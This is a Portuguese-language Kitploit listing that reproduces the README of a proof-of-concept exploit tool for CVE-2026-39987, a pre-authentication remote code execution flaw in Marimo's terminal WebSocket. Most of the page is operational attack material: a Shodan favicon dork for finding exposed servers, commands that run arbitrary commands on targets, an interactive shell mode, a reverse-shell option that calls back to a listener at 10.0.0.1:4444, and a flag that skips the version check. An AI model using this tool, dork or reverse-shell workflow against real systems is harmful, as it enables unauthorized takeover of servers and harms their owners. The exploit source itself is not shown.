Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 Ferramenta de Exploração - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) | Kitploit
Ferramentas/GitHubGitHub/m3ph1569/cve-2026-39987-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 Ferramenta de Exploração - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

Ver Repositório
214há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-39987 - Marimo < 0.23.0 RCE Pré-Autenticação (WebSocket)

CVSS Severity Python License

Exploit de Prova de Conceito (PoC) para uma vulnerabilidade crítica de Execução Remota de Código (RCE) Pré-Autenticação em versões do Marimo anteriores a 0.23.0.

A vulnerabilidade permite que um atacante não autenticado se conecte ao endpoint WebSocket (/terminal/ws) e execute comandos arbitrários do sistema no servidor alvo.

Funcionalidades

  • Verificação Automatizada: Verifica automaticamente o alvo quanto à vulnerabilidade identificando a versão e verificando a presença da aplicação Marimo (via favicon e endpoints /api/version).
  • Execução de Comando Único: Envie um único comando para o alvo e receba a saída.
  • Shell Interativo: Inicie um shell persistente pseudo-interativo para interagir com o alvo de forma contínua.
  • Geração de Reverse Shell: Suporte integrado para gerar e executar payloads de reverse shell.
  • Bypass de Verificação: Capacidade de ignorar as verificações de versão e presença com a flag --no-check para ambientes onde os endpoints possam estar ocultos.

Shodan / FOFA Dork

Você pode usar o seguinte dork para identificar instâncias potencialmente vulneráveis:

http.favicon.hash:-1864630356

Instalação

É recomendado usar um ambiente virtual Python para instalar as dependências.

# 1. Clone the repository
git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
cd CVE-2026-39987-POC

# 2. Create and activate a virtual environment
python -m venv .CVE-2026-39987

# Windows
.CVE-2026-39987\Scripts\activate
# Linux/macOS
source .CVE-2026-39987/bin/activate

# 3. Upgrade pip and Install required dependencies
# Windows
py pip install --upgrade pip ; pip install -r requirements.txt
# Linux/MacOS
python3 pip install --upgrade pip && pip install -r requirements.txt

Uso

usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]

positional arguments:
  target               Target URL (e.g. http://localhost:8080)
  command              Command to execute (omit when using -i)

options:
  -h, --help           show this help message and exit
  --no-check           Skip vulnerability version check

Execution modes:
  -i, --interactive    Interactive shell mode
  --revshell IP PORT   Generate & send a bash reverse shell payload

WebSocket tuning:
  --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
  --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
  --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)

Reconnect options:
  --max-retries N      Max auto-reconnect attempts (default: 5)
  --no-reconnect       Disable auto-reconnect on unexpected disconnect

Exemplos

1. Executar um único comando:

python CVE-2026-39987.py http://target.com:8080 "id"

2. Iniciar um shell interativo:

python CVE-2026-39987.py http://target.com:8080 -i

3. Executar um reverse shell: Certifique-se de ter um netcat listener em execução na sua máquina (ex: nc -lvnp 4444).

python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444

4. Ignorar verificações e forçar execução:

python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check

Contribuição

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

  1. Fork do repositório
  2. Crie sua branch de funcionalidade (git checkout -b feature/update-feature)
  3. Commit suas alterações (git commit -m 'Add update feature')
  4. Push para a branch (git push origin feature/update-feature)
  5. Abra um Pull Request

Aviso Legal

Esta ferramenta é estritamente para fins educacionais e hacking ético autorizado. O autor não se responsabiliza por qualquer uso indevido, danos ou atividades ilegais causadas por este script. Sempre certifique-se de ter permissão explícita do proprietário do sistema antes de realizar qualquer teste de segurança. O uso não autorizado deste script é ilegal e punível por lei.

Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.


Feito com ☕︎ por M3PH1569
Baixar ferramenta